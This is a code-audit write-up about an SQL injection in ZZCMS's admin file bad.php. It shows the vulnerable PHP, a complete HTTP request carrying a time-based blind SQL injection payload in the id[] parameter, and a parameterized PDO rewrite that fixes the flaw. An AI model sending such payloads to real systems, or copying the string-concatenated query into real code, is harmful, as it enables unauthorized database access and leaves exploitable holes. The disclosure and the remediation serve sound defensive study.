Readers without a coding background can first read "[Zero basics] PHP code audit: SQL injection" (【零基础】php代码审计之sql注入, 小韩韩啊's blog on 优快云).
Vulnerable file:
/admin/bad.php
<?php include("admin.php");?>
...
# lines 10-41
checkadminisdo("badusermessage");
$action=isset($_REQUEST["action"])?$_REQUEST["action"]:'';
if ($action<>""){
    $id="";
    if(!empty($_POST['id'])){
        // every element of the id[] array is appended verbatim; no type check
        for($i=0; $i<count($_POST['id']);$i++){
            $id=$id.($_POST['id'][$i].',');
        }
        $id=substr($id,0,strlen($id)-1);//strip the trailing ","
    }
    if ($id==""){
        echo "<script>alert('操作失败!至少要选中一条信息。');history.back();</script>";
    }
}
if ($action=="del"){
    if (strpos($id,",")>0){
        // $id is concatenated straight into the statement
        $sql="delete from zzcms_bad where id in (". $id .")";
    }else{
        $sql="delete from zzcms_bad where id='$id'";
    }
    query($sql);
    echo "<script>location.href='bad.php'</script>";
}
if ($action=="lockip"){
    if (strpos($id,",")>0){
        $sql="update zzcms_bad set lockip=1 where id in (". $id .")";
    }else{
        $sql="update zzcms_bad set lockip=1 where id='$id'";
    }
    query($sql);
}
It is plain to see that in the action=="del" branch the values taken from $_POST['id'] are concatenated into the SQL statement without any filtering and passed straight to query() for execution. The request below demonstrates it with a time-based payload in the id[1] parameter:
POST /admin/bad.php HTTP/1.1
Host: your host
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://zzcms.com
Connection: close
Referer: http://zzcms.com/admin/bad.php
Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
Upgrade-Insecure-Requests: 1
action=del&id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
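As an added example (not ZZCMS's own code), here is the del branch rewritten so that each id is validated as a positive integer and bound through PDO placeholders instead of being concatenated into the SQL text. The function names, the in-memory SQLite table and the sample rows are constructed for the demonstration.

```php
<?php
// Reduce the raw id[] array to distinct positive integers. Anything that is
// not a plain digit string (e.g. "1 AND (SELECT ...)", "", "-1", nested arrays)
// is dropped, so the SQL text is never influenced by the request.
function normalizeIds(array $raw): array {
    $ids = [];
    foreach ($raw as $v) {
        if (is_string($v) && ctype_digit($v) && strlen($v) < 19 && (int)$v > 0) {
            $ids[(int)$v] = (int)$v;   // keyed by value to drop duplicates
        }
    }
    return array_values($ids);
}

// Delete the selected rows with one bound parameter per id. The original
// single-id / comma-list distinction is unnecessary: IN (?) works for one value.
function deleteBad(PDO $db, array $rawIds): int {
    $ids = normalizeIds($rawIds);
    if ($ids === []) {
        return 0;   // caller can show the "at least one row" message as before
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("DELETE FROM zzcms_bad WHERE id IN ($placeholders)");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);   // positional, 1-based
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed demo data: an in-memory SQLite table standing in for zzcms_bad.
$db = new PDO('sqlite::memory:', null, null,
              [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE zzcms_bad (id INTEGER PRIMARY KEY, lockip INTEGER DEFAULT 0)");
$db->exec("INSERT INTO zzcms_bad (id) VALUES (1),(2),(3)");

// The id[] values from the request above: id[0]=0 is not a valid row id and
// id[1] is not an integer, so nothing reaches the database.
$attack = ['0', '1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)'];
echo deleteBad($db, $attack), " row(s) deleted for the injected request\n";   // 0

// A legitimate multi-select still works.
echo deleteBad($db, ['2', '3']), " row(s) deleted for a normal request\n";     // 2
```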